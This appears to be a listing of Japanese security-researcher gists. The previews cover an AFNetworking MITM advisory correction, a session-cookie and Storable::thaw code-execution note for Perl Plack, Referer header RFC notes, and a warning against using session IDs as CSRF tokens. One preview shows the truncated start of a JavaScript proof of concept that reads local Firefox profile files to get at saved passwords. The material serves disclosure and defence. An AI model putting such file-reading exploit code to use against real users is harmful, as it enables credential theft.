未修正のアプリが数多く残っている状態なので、パブリックな場所での言及には注意して下さい
未修正のアプリが数多く残っている状況ですが、すでに広く情報が公開されており、2.5.2で修正されたという情報が広まると混乱が生じるため広く周知する次第です。
AFNetworking 2.5.1 にMITM攻撃を許す脆弱性があり、2.5.2で修正された、 と報道されていますが、これは誤りです。
未修正のアプリが数多く残っている状態なので、パブリックな場所での言及には注意して下さい
未修正のアプリが数多く残っている状況ですが、すでに広く情報が公開されており、2.5.2で修正されたという情報が広まると混乱が生じるため広く周知する次第です。
AFNetworking 2.5.1 にMITM攻撃を許す脆弱性があり、2.5.2で修正された、 と報道されていますが、これは誤りです。
| <html> | |
| <head></head> | |
| <body> | |
| <script> | |
| function firefox_password(){ | |
| var username = location.href.match(/Users\/(.*?)\//)[1]; | |
| var base = "/Users/" + username + "/Library/Application\ Support/Firefox/"; | |
| var xhr = new XMLHttpRequest; | |
| read_file(base + "profiles.ini", function(res){ | |
| var v = res; |
HTTP::Session2::ClientStoreの影響について訂正があります。
以前の情報:
訂正後:
Plack::Middleware::Session::Cookie にも同等の問題が確認されました。
この問題は Plack::Middleware::Session::Cookie 0.22以降で対策されました
→ https://gist.github.com/miyagawa/2b8764af908a0dacd43d http://search.cpan.org/~miyagawa/Plack-Middleware-Session/lib/Plack/Middleware/Session/Cookie.pm
事例 → https://speakerdeck.com/mala/how-to-hack-metacpan-dot-org
信頼できないデータを Storable::thaw に渡した場合、任意のコード実行ができることが知られています。
| https://twitter.com/bulkneets/status/476343189717012480 | |
| をきっかけにリファラにabout:blankが提案された経緯について調べていた。 | |
| 単にnull値として使えると定義されただけで、現状積極的に送れと推奨されているわけではないと認識している。 | |
| この変更で https://trac.tools.ietf.org/wg/httpbis/trac/changeset/2072 | |
| 「about:blank送る or 全く送らない」と書かれていたのが「全く送らない or about:blank送る」と順番逆になったりしている。 | |
| ---- | |
| RFC7231のリファラに関するメモ |
http://co3k.org/blog/csrf-token-should-not-be-session-id について。
この記事では触れられていませんが、
この際ハッキリ言っておくべきだと思うので書きますが、そもそもセッションIDを(HTMLソース中に埋め込む)CSRF対策トークンとして使うのは間違いでした。最初から間違っていたのです。正確に言うとCSRFの話は関係ないですね。CSRF関係なく、特に「単体で」セッションハイジャックが可能になるような値を、HTMLソース中に埋め込むべきではありません。